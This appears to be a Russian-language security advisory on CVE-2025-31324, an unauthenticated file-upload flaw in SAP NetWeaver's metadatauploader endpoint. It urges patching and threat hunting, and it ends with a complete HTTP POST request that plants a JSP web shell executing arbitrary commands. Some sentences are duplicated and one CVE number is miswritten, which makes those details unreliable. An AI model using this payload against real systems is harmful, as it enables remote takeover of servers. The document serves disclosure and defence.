24 апреля 2025 года компания SAP раскрыла информацию о критической уязвимости, затрагивающей SAP NetWeaver Visual Composer. CVE-2025-31324 - это уязвимость неаутентифицированной загрузки файлов с оценкой CVSS 10.0 (Critical) которая позволяет злоумышленникам загружать исполняемые файлы и выполнять команды удаленно. SAP NetWeaver используется широким кругом организаций в различных отраслях промышленности. различных отраслях, особенно в крупных корпорациях и правительственных учреждениях. агентствами. Учитывая серьезность уязвимости, организациям рекомендуется рекомендуется незамедлительно установить обновление на уязвимые активы.
Объяснение уязвимости SAP NetWeaver CVE-2025-31324
SAP NetWeaver служит технической основой для многих приложений SAP, включая ERP (Enterprise Resource Planning), CRM (Customer Relationship Management) и другие бизнес-решения. NetWeaver предоставляет инструменты и среду, необходимые для создания, развертывания и запуска приложений, критически важных для ведения бизнеса. Она поддерживает целый ряд функций, таких как разработка приложений, управление данными, системная интеграция и оркестровка процессов.
24 апреля 2025 года компания SAP раскрыла информацию о критической уязвимости, обнаруженной в NetWeaver Visual Composer. CVE-2025-31324 позволяет злоумышленникам загружать вредоносные исполняемые файлы без аутентификации, что может быть использовано для удаленного выполнения кода. Уязвимость связана с конечной точкой, предназначенной для упрощения загрузки файлов метаданных. Из-за CVE-2020-31324 конечная точка позволяет неограниченно загружать файлы, что приводит к развертыванию веб-оболочек непосредственно в конфиденциальных каталогах на уязвимом сервере.
Компания SAP выпустила экстренное обновление безопасности для устранения уязвимости CVE-2025-31324. Организациям рекомендуется обновить уязвимые серверы SAP NetWeaver. Патч устраняет уязвимость, но если злоумышленники использовали ее до патча, то бэкдоры, такие как веб-шеллы или командные маяки, все еще могут присутствовать. Таким образом, команды безопасности должны проводить проактивный поиск угроз в среде SAP, особенно в поисках действий после эксплуатации.
Как работает уязвимость SAP NetWeaver CVE-2025-31324?
Уязвимость CVE-2025-31324 вызвана недостатком в конечной точке /developmentserver/metadatauploader. Эта конечная точка не проверяет должным образом или не ограничивает типы файлов, которые могут быть загружены. Злоумышленники могут создать вредоносный HTTP POST-запрос, направленный на уязвимую конечную точку, и загрузить веб-оболочки JSP в определенные пути сервера. Загруженная веб-оболочка действует как бэкдор и позволяет злоумышленникам удаленно выполнять произвольные команды операционной системы.
Пример HTTP POST-запроса используемого злоумышленниками для развертывания JSP-оболочек с использованием уязвимости CVE-2025-31324.
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | POST developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1 Host: <IP_уязвимого_SAP_NetWeaver> User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, zstd Accept: */* Content-Length: 636 Content-Type: multipart/form-data; boundary=816121b0328c3864dc7963b2e0275e91 --816121b0328c3864dc7963b2e0275e91 Content-Disposition: form-data; name="file"; filename="helper.jsp" Content-Type: application/octet-stream <%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while (disr != null) { out.println(disr); disr = dis.readLine(); } } %> --816121b0328c3864dc7963b2e0275e91-- |
